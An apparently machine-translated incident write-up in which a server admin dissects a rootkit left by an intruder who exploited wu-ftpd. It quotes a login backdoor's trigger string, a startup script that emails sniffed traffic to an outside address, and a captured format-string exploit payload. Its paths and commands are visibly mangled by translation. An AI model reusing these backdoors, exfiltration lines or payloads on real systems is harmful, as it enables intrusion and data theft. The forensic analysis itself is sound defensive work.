Online hacker tracking

1. When I checked one of my machines yesterday, I accidentally discovered that someone had intruded into my machine. In fact, it was my own mistake and I did not patch wuftpd26,
Without modifying/etc/ftpusers, the remote vulnerability wuftpd26 was easily exploited to access my machine as an anonymous user. But this friend
You obviously did not consider using rootkit. The result of ps output is as follows:

[Root @ ns] # ps
PID TTY STAT TIME COMMAND
678 1 S/sbin/mingetty tty1
679 2 S/sbin/mingetty tty2
680 3 S/sbin/mingetty tty3
681 4 S/sbin/mingetty tty4
682 5s/sbin/mingetty tty5
683 6 S/sbin/mingetty tty6
5557? S 0: 00/bin/sh-I
5591? R 0: 00 ps

I think anyone who reads this output will know what it means. Let's take a step-by-step look at what he has done.
[This hack did not expect that this machine had a master and installed its own rootkit.]
[Root @ ns] # strings/bin/login | more
..........
_ Bss_start
_ End
PPRV
DISPLAY
/Bin/envpc
L4m3r0x
/Bin/sh
It can be seen from the above that it is a login backdoor. After using export PATH = "l4m3r0x", you can directly telnet to the other party to get it #
[Root @ ns] # strings/bin/ls | more
.....
Always
/Usr/local/share/locale
Fileutils
GNU fileutils-3.13.
Vdir
% S-% s
/Dev/sgk/. fsdc/. 1 file
// DIRED //
// SUBDIRED //
POSIXLY_CORRECT
COLUMNS
Note:/dev/sgk/. fsdc/. 1file is where the rootkit file is stored. Let's see what is there.
[Root @ ns] # mv/dev/sgk/. fsdc/. 1 file/tmp
[Root @ ns] # ls-la/dev/sgk/. fsdc
Total 641
Drwxr-xr-x 5 root ftp 1024 Feb 4.
Drwxr-xr-x 3 root ftp 1024 Feb 2 ..
-Rw-r -- 1 root ftp 7 Feb 2 17: 11. 1 logz
-Rw-r -- 1 root ftp 88 Feb 2 :11. 1 proc
Drwxr-xr-x 2 root ftp 1024 Feb 2 backup
Drwxrwxr-x 2 lujiang 1024 Feb 2 clean
-Rwxr-xr-x 1 lujiang 5578 Nov 18 filetrans
-Rwxr-xr-x 1 lujiang 9396 Aug 23 1999 killall-real
-Rwxr-xr-x 1 lujiang 7578 Aug 21 parse
-Rwxr-xr-x 1 lujiang 6232 Sep 9 1999 parse1
Drwxrwxr-x 2 lujiang 1024 Jan 28 patches
-Rwxr-xr-x 1 lujiang 28004 Aug 23 1999 ps-real
-Rwxr-xr-x 1 lujiang 580696 Feb 18 2000 ssh
-Rw-r -- 1 root ftp 1398 Feb 4 system

Well, it seems that there are quite a few things. From ftp, we can know that he is using the ftP vulnerability, and from lujiang we know that he has also stolen a local user.
[Root @ ns. fsdc] # cat. 1 logz
Rshd
[Root @ ns. fsdc] # cat. 1 proc
3 nscd
2 nmap
2 lscan
2 login
2 lpset
2 xtty
2 nscd
3 statd
3 lpq
3 scan
3 sniff
3 envpc
[Root @ ns. fsdc] # cat/tmp/. 1 file
Sgk
. Fsdc
. Clib
. 1 proc
. 1 addr
. 1 file
. 1 logz
Envpc
Xtty
Pttys
Filetrans
Lpset
Libload
System
Parse

. 1logz is called by syslogd to hide the records generated by the listed commands.
. 1proc is called by ps command. Hide the listed process name
. 1file is ls, find command drop. Hide the listed file name,
[Root @ ns. fsdc] # cd patches
[Root @ ns patches] # cat patch. sh
#! /Bin/sh
Echo "[1] Patching WU-FTPd ..."
Rpm-Uhv wuftpd. rpm
Echo "[2] Patching NFS-utils ..."
Rpm-fvl nfs-utils.rpm
Ps aux>/tmp/psaux
If ["'cat/tmp/psaux | grep rpc. statd'"]; then
Echo "[3] Restarting the rpc. statd daemon (NFS-utils )"
/Etc/rc. d/init. d/nfslock restart
Else
Echo "[4] The daemon rpc. statd isnt running, so no need to restart! "
Fi
Rm/tmp/psaux
This is a patch for wuftpd and rpc. statd vulnerabilities. [I appreciate this!]
I have not carefully read other file directories. [these packages will be downloaded]
Based on the hidden file list of. 1file, we found these files one by one.
[Root @ ns. fsdc] # strings/usr/bin/xtty
......
PPRV
(Nfsiod)
Socket
Bind
Listen
Accept
/Bin/sh
It's not hard to see that it's a backdoor.
[Root @ ns. fsdc] # strings/dev/pttys
#! /Bin/sh
Cat/dev/sgk/. fsdc/system | email prosupp@usa.net>/dev/null 2> & 1
Nohup/usr/lib/lpset>/dev/null &
Nohup/usr/bin/xtty>/dev/null &
Rm-rf nohup. out
This hack is very clever. With this script, you can send the sniffing record to the prosupp@usa.net [/dev/sgk/. fsdc/system is a sniffing Record]
[Root @ ns. fsdc] # cat/etc/rc. d/rc. sysinit | more
..........
If ["$ PROMPT "! = "No"]; then
/Sbin/getkey I & touch/var/run/confirm
Fi
Wait
# Name Server Cache Daemon ..
/Usr/sbin/nscd-q
# Name Server Cache Daemon ..
/Usr/sbin/nscd-q
# Kernel module checker
/Usr/lib/libload>/dev/null 2> & 1
[Root @ ns bak] # strings/usr/sbin/nscd | more
+ Q $9
/Usr/info/. clib/sshd_config
Received SIGHUP; restarting.
Restart failed: av [0] = %. 100 s, error: %. 100 s.
Canceled ed signal % d; terminating.
Timeout before authentication.
Generating new % d bit RSA key.
RSA key generation complete.
F: p: B: k: h: g: diqV:
I686-unknown-linux
1.2.27
Sshd version % s [% s]
Usage: % s [options]
Options:
/Usr/info/. clib stores an ssh backdoor, which opens the door for hack after the machine is started.
[Root @ ns. fsdc] # strings/sbin/syslogd
========================================================== ================================
Time: % s Size: % d
Path: % s
=> % S [% d]
------------------------------------------------------------
Exiting...
Cant get SOCK_PACKET socket
Cant get flags
Cant set promiscuous mode
/Dev/null
Eth0
System
Cant open log
This hack changes the syslogd file and becomes a sniffer

..........
The next step is to restore the system and modify the stolen account password. This is not the case here. I know from my sniffing records that he came from these two machines.

[Root @ ns man] # more system2
========================================================== ================================
Time: Fri Feb 2 17:26:07 Size: 1056
Path: 210.217.237.75 => ns.xxx.cn [21]
------------------------------------------------------------
# G #> 4 h #> 4 hUSER ftp
#> HPASS 111F11CA? K ^ 11 ^ Ff1 ^ = 11 ^ C11 ^ u1F ^ = 0F1FvFNV110bin0sh1 .. 11
#> H <#? Hsite exec xx (%. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %.
F %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f
%. F %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %
. F %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %.
F %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f
%. F %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f %. f % c %. f | % p
#H
========================================================== ================================
Time: Sat Feb 3 06:01:39 Size: 44
Path: 216.12.101.4 =